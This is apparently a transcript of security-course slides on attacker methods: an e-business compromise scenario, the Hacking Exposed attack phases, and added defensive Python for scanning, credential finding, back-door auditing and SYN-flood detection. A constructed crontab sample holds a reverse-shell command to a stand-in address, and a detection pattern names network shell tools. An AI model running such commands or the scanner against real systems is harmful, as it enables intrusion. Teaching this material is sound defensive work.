Lesson 5 Knowing the Threat

Upload: chrystal-cunningham

Post on 12-Jan-2016


TRANSCRIPT

Page 1: Lesson 5 Knowing the Threat. Unauthorized use of Computer Systems 2000 CSI/FBI Survey Trend

Lesson 5

Knowing the Threat

Page 2:

Chart: Unauthorized Use of Computer Systems, 2000 CSI/FBI Survey trend. One bar group per year 1996-2000, split by response (Yes, No, Don't Know); vertical axis 0-70.

Page 3:

Chart: Frequency of Point of Attack, 2000 CSI/FBI Survey trend. One bar group per year 1996-2000, split by point of attack (Internal Systems, Remote Dial-In, Internet); vertical axis 0-60.

Page 4:

Chart: Likely Sources of Attack, 2000 CSI/FBI Survey. One bar group per year 1997-2000, split by source (Foreign Governments, Foreign Corporations, Independent Hackers, U.S. Competitors, Disgruntled Employees; the legend also lists U.S. Corporations); vertical axis 0-90.

Page 5:

E-Commerce Security Example

Breaking an E-Business

Page 6:

Consider this Network

Network diagram: Router, WEB Server, DBA Server, Investment App servers, Email Server, User Clients, and the internal Network that connects them.

How Can A Hacker Attack?

Pages 7-9:

The same network diagram, now with an ATTACKER outside the Router. The attack is built up one step per slide:

Step 1: Attacker exploits a weakness in a CGI script to break through the firewall and gain shell privileges on the host.

Step 2: Attacker finds the dBase password in the CGI script and downloads all account numbers and passwords.

Step 3: Attacker installs NetBus and controls the manager's terminal.

Page 10:

Going for the Kill!

The normal customer transaction flow, with the attacker's step inserted where it happens:

Customer enters account ID and PW

Customer is authenticated and access is granted

Customer checks portfolio performance

Customer updates portfolio tracking preferences

Customer buys/sells shares

Step 4: Attacker credits account under their control

Investment bank debits/credits customer's cash account and updates portfolios

Investment bank notifies customer with confirmation of transaction

Page 11:

So What Happens When Computer Security Fails?

Incident Response: A Six Step Process
- Preparation: Proactive Computer Security
- Identification
- Containment
- Eradication
- Recovery
- Hot Wash

Page 12:

History Lesson: The Art of War, Sun Tzu

Lesson for you:
Know the enemy, know yourself... and in a 100 battles you will never be defeated.
If ignorant both of your enemy and of yourself, you are certain in every battle to be in peril.

Page 13:

History Lesson: The Art of War, Sun Tzu

Lesson for the Hacker:
Probe him and learn where his strength is abundant and where deficient.
To subdue the enemy without fighting is the acme of skill.
One able to gain victory by modifying his tactics in accordance with the enemy situation may be said to be divine.

Page 14:

Hacker Attacks

- Intent is for you to know your enemy
- Not intended to make you a hacker
- Need to know defensive techniques
- Need to know where to start the recovery process
- Need to assess the extent of the investigative environment

Page 15:

Anatomy of a Hack

FOOTPRINTING -> SCANNING -> ENUMERATION -> GAINING ACCESS -> ESCALATING PRIVILEGE -> PILFERING -> COVERING TRACKS -> CREATING BACKDOORS

DENIAL OF SERVICE (separate branch, see Page 25)

Source: Hacking Exposed, McClure, Scambray, and Kurtz


Page 17:

Footprinting

Objective: Acquire the target address range; gather namespace information; a surgical attack depends on not missing details.

Technique: Open source search; whois; web interface to whois; ARIN whois; DNS zone transfer.

Source: Hacking Exposed, McClure, Scambray, and Kurtz

Page 18:

Scanning

Objective: Bulk target assessment; determine listening services; focus the attack vector.

Technique: Ping sweep; TCP/UDP scan; OS detection.

Source: Hacking Exposed, McClure, Scambray, and Kurtz
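As an added example (not from the lesson or from Hacking Exposed), a minimal TCP connect scan in Python, run against a throwaway listener started in the same process so it works offline. The listener, its banner string and the two scanned ports are constructed for the demo. The point a defender should take from it: a connect scan completes the three-way handshake, so unlike a half-open SYN scan it appears in the target service's own connection logs, which is the earliest place to detect the scanning phase.

```python
import socket
import threading
from typing import Dict, Iterable, Optional

# Constructed banner for the throwaway local service (not a real SSH daemon).
DEMO_BANNER = b"SSH-2.0-DemoListener\r\n"


def start_listener(banner: bytes = DEMO_BANNER) -> int:
    """Start a TCP service on 127.0.0.1 (ephemeral port) that greets each
    client with `banner`; returns the port so the scan has a known-open target."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def reserve_closed_port() -> int:
    """Bind and immediately release an ephemeral port so we have a known-closed one."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, Optional[bytes]]:
    """TCP connect scan: complete the handshake on each port, then read a banner.
    Returns {open_port: banner_or_None}; ports that refuse or time out are omitted."""
    listening: Dict[int, Optional[bytes]] = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                continue  # RST (closed) or no answer within the timeout (filtered)
            try:
                data = s.recv(256)
            except OSError:
                data = b""
            listening[port] = data or None  # open but silent services show as None
    return listening


def identify_service(banner: Optional[bytes]) -> str:
    """Crude service guess from the greeting: the 'determine listening services' step."""
    if not banner:
        return "unknown (no banner)"
    if banner.startswith(b"SSH-"):
        return "ssh"
    if banner.startswith(b"220 "):
        return "smtp/ftp (220 greeting)"
    return "unknown: " + banner[:40].decode("ascii", "replace").strip()


if __name__ == "__main__":
    open_port = start_listener()
    closed_port = reserve_closed_port()
    for port, banner in connect_scan("127.0.0.1", [open_port, closed_port]).items():
        print(f"127.0.0.1:{port} open -> {identify_service(banner)}")
```

Only the open port comes back; the closed one gets a RST and is dropped silently. Real scanners add UDP probes and TCP/IP stack fingerprinting for the OS detection step, which this deliberately leaves out.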

Page 19:

Enumeration

Objective: Intrusive probing commences; identify valid accounts; identify poorly protected shares.

Technique: List user accounts; list file shares; identify applications.

Source: Hacking Exposed, McClure, Scambray, and Kurtz

Page 20:

Gaining Access

Objective: Informed attempt to access the target; typically user-level access.

Technique: Password sniffing; file share brute forcing; password file grab; buffer overflows.

Source: Hacking Exposed, McClure, Scambray, and Kurtz

Page 21:

Escalating Privilege

Objective: Gain root-level access.

Technique: Password cracking; known exploits.

Source: Hacking Exposed, McClure, Scambray, and Kurtz

Page 22:

Pilfering

Objective: Information gathering to access trusted systems.

Technique: Evaluate trusts; search for cleartext passwords.

Source: Hacking Exposed, McClure, Scambray, and Kurtz
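Step 2 of the e-business example (the dBase password sitting in the CGI script) and the pilfering technique "search for cleartext passwords" are the same activity seen from two sides: the attacker greps the compromised host for credentials, so the defender should grep first. Added example, not from the lesson or from Hacking Exposed: a small Python scanner over the text of a constructed Perl CGI script (the script, variable names, hostnames and secrets are invented for the demo). It masks what it finds so that the report does not itself become another cleartext copy of the password.

```python
import re
from typing import List, Tuple

# Constructed sample imitating the CGI script of Step 2 (made-up names and secrets).
SAMPLE_CGI = r'''#!/usr/bin/perl
use DBI;
my $db_user = "portfolio";
my $db_pass = "Tr4d3r!99";
my $dbh = DBI->connect("dbi:mysql:accounts;host=dba-server", $db_user, $db_pass);
my $feed = "https://quotes.example/api?token=abcd1234";
# password prompt for operators is handled elsewhere
'''

# Three shapes cleartext credentials commonly take in scripts and config files.
CRED_PATTERNS = [
    # variable assignment: $db_pass = "..."  /  passwd: '...'  /  API_TOKEN = "..."
    re.compile(r"""(?i)\b(\w*(?:pass(?:w(?:or)?d)?|pwd|pw|secret|token)\w*)\s*[=:]\s*["']([^"']{4,})["']"""),
    # credentials embedded in a URL or DSN: scheme://user:pass@host
    re.compile(r"""[a-z][a-z0-9+.-]*://([^/\s:@]+):([^@\s]+)@"""),
    # key=value inside a query string or connection string
    re.compile(r"""(?i)[?&;](pass(?:word)?|pwd|token)=([^&\s"']+)"""),
]


def mask(secret: str) -> str:
    """Keep two characters so an analyst can confirm the hit; never copy the full secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_cleartext_credentials(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, credential_name, masked_value) for each probable
    cleartext credential in `text`, at most one finding per name per line."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        seen = set()
        for pattern in CRED_PATTERNS:
            for m in pattern.finditer(line):
                name, secret = m.group(1), m.group(2)
                if name.lower() in seen:
                    continue
                seen.add(name.lower())
                findings.append((lineno, name, mask(secret)))
    return findings


if __name__ == "__main__":
    for lineno, name, masked in find_cleartext_credentials(SAMPLE_CGI):
        print(f"line {lineno}: {name} = {masked}")
```

Run over a web root or a configuration tree, the same function is the defender's pilfering pass. A hit means the credential must be rotated, not just moved out of the file, because anyone who already read the script has it.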

Page 23:

Cover Tracks

Objective: Ensure highest access; hide access from the system administrator or owner.

Technique: Clear logs; hide tools.

Source: Hacking Exposed, McClure, Scambray, and Kurtz

Page 24:

Creating Back Doors

Objective: Deploy trap doors; ensure easy return access.

Technique: Create rogue user accounts; schedule batch jobs; infect startup files; plant remote control services; install monitors; Trojanize.

Source: Hacking Exposed, McClure, Scambray, and Kurtz
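Added example, not part of the lesson: a Python audit of the two back-door techniques above that leave the clearest traces on a Unix host, rogue user accounts in /etc/passwd and scheduled batch jobs in the system crontab. The passwd and crontab contents, the /tmp/.x path and the 203.0.113.7 address are constructed; on a real host the live files are read and compared against a known-good baseline taken in the Preparation phase.

```python
import re
from typing import List

# Constructed samples (not from a real host): a passwd file with a rogue UID-0
# account appended, and a system crontab with a scheduled reverse shell.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jsmith:x:1001:1001:J. Smith:/home/jsmith:/bin/bash
sysbackup:x:0:0::/tmp/.x:/bin/sh
"""

SAMPLE_CRONTAB = """# m h dom mon dow user command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  root  /tmp/.x/nc -e /bin/sh 203.0.113.7 4444
0 3   * * *  root  /usr/local/sbin/nightly-backup.sh
"""

# World-writable locations a legitimate account or cron job should not live in.
SUSPECT_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Network and shell tools that have no business in a scheduled job on most servers.
SUSPECT_TOOLS = re.compile(r"(?:^|[\s/])(?:nc|ncat|socat|telnet|curl|wget)\b|\s-e\s+/bin/(?:ba)?sh\b")


def audit_passwd(passwd_text: str) -> List[str]:
    """Flag extra UID-0 accounts, shared UIDs and home directories in temp paths."""
    findings: List[str] = []
    uid_to_names = {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"passwd: malformed entry {line!r}")
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        uid_to_names.setdefault(uid, []).append(name)
        if uid == "0" and name != "root":
            findings.append(f"passwd: extra UID-0 account {name!r} (home={home}, shell={shell})")
        if home.startswith(SUSPECT_PATHS):
            findings.append(f"passwd: account {name!r} has its home directory in a temp path: {home}")
    for uid, names in uid_to_names.items():
        if uid != "0" and len(names) > 1:
            findings.append(f"passwd: UID {uid} shared by {names}")
    return findings


def audit_crontab(crontab_text: str) -> List[str]:
    """System crontab format: five schedule fields, the user, then the command."""
    findings: List[str] = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 6)
        if len(parts) < 7:
            continue
        command = parts[6]
        if any(p in command for p in SUSPECT_PATHS):
            findings.append(f"crontab line {lineno}: job runs from a temp path: {command}")
        if SUSPECT_TOOLS.search(command):
            findings.append(f"crontab line {lineno}: network/shell tool in scheduled job: {command}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_crontab(SAMPLE_CRONTAB):
        print(finding)
```

Per-user crontabs, rc/init scripts and startup files need the same pass; the string matching here is a starting point, and a diff against the baseline copy catches what the keyword lists miss.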

Page 25:

Denial of Service

Objective: If unable to escalate privilege, then kill the target; build a DDoS network.

Technique: SYN flood; ICMP attacks; identical src/dst SYN requests; out-of-bounds TCP options; DDoS.

Source: Hacking Exposed, McClure, Scambray, and Kurtz
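Added example, not from the lesson or from Hacking Exposed: detection logic in Python for two of the techniques listed, a spoofed SYN flood and the "identical src/dst SYN request" (the Land packet), run over a constructed packet list written in tcpdump flag notation. Addresses (documentation ranges), ports, timing and counts are made up, and the SYN-per-second threshold is an assumed tuning value.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Packet:
    ts: float     # seconds since capture start
    src: str
    dst: str
    dport: int
    flags: str    # tcpdump notation: "S" = SYN, "S." = SYN/ACK, "." = ACK, "P." = PSH/ACK


def constructed_capture() -> List[Packet]:
    """Constructed sample traffic: one normal handshake, a spoofed SYN flood
    against 10.0.0.5:443, and one Land packet."""
    pkts = [
        Packet(0.00, "192.0.2.10", "10.0.0.5", 443, "S"),
        Packet(0.01, "10.0.0.5", "192.0.2.10", 51000, "S."),
        Packet(0.02, "192.0.2.10", "10.0.0.5", 443, "."),
    ]
    # 60 SYNs within one second, each from a different (spoofed) source, never completed.
    for i in range(60):
        pkts.append(Packet(1.0 + i / 60, f"198.51.100.{i + 1}", "10.0.0.5", 443, "S"))
    # Land attack: a SYN whose source and destination are both the victim.
    pkts.append(Packet(2.5, "10.0.0.5", "10.0.0.5", 139, "S"))
    return pkts


SYN_PER_SECOND_THRESHOLD = 50  # assumed tuning value; derive it from a baseline of normal traffic


def detect_land(pkts: List[Packet]) -> List[Packet]:
    """Identical src/dst SYN requests: legitimate traffic never has src == dst."""
    return [p for p in pkts if p.flags == "S" and p.src == p.dst]


def half_open_connections(pkts: List[Packet]) -> Dict[str, int]:
    """Count SYNs per dst:port never followed by the client's ACK. A flood leaves
    these piling up; a flash crowd of real clients completes its handshakes."""
    pending = set()
    for p in pkts:
        key = (p.src, p.dst, p.dport)
        if p.flags == "S":
            pending.add(key)
        elif p.flags in (".", "P.") and key in pending:
            pending.discard(key)  # third packet of the handshake: connection completed
    per_target: Dict[str, int] = defaultdict(int)
    for _src, dst, dport in pending:
        per_target[f"{dst}:{dport}"] += 1
    return dict(per_target)


def detect_syn_flood(pkts: List[Packet], threshold: int = SYN_PER_SECOND_THRESHOLD) -> Dict[str, dict]:
    """Alert on any dst:port receiving >= threshold bare SYNs within one wall-clock
    second. The distinct-source count is reported because a high value points at spoofing."""
    syns: Dict[tuple, int] = defaultdict(int)
    sources: Dict[tuple, set] = defaultdict(set)
    for p in pkts:
        if p.flags == "S":
            bucket = (p.dst, p.dport, int(p.ts))
            syns[bucket] += 1
            sources[bucket].add(p.src)
    alerts: Dict[str, dict] = {}
    for (dst, dport, second), count in syns.items():
        if count >= threshold:
            alerts[f"{dst}:{dport}"] = {
                "second": second,
                "syns": count,
                "distinct_sources": len(sources[(dst, dport, second)]),
            }
    return alerts


if __name__ == "__main__":
    capture = constructed_capture()
    for p in detect_land(capture):
        print(f"LAND packet: {p.src} -> {p.dst}:{p.dport} at t={p.ts}")
    print("half-open per target:", half_open_connections(capture))
    print("SYN flood alerts:", detect_syn_flood(capture))
```

The SYN-rate alert alone cannot tell a flood from a popular launch day; the half-open count is the discriminating signal, which is also why SYN cookies on the victim are the standard mitigation rather than rate limits.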

Page 26:

Hacker Exploits per SANS

RECONNAISSANCE -> SCANNING -> EXPLOIT SYSTEMS -> KEEPING ACCESS -> COVER TRACKS

Source: SANS Institute

Page 27:

Hacking Summary

- Hacking on the rise
- Hacktivism
- New crime vector
- Loose international laws
- Tools automated and readily available
- Blended Threats
- Multi-axis attacks
- Automated Zombies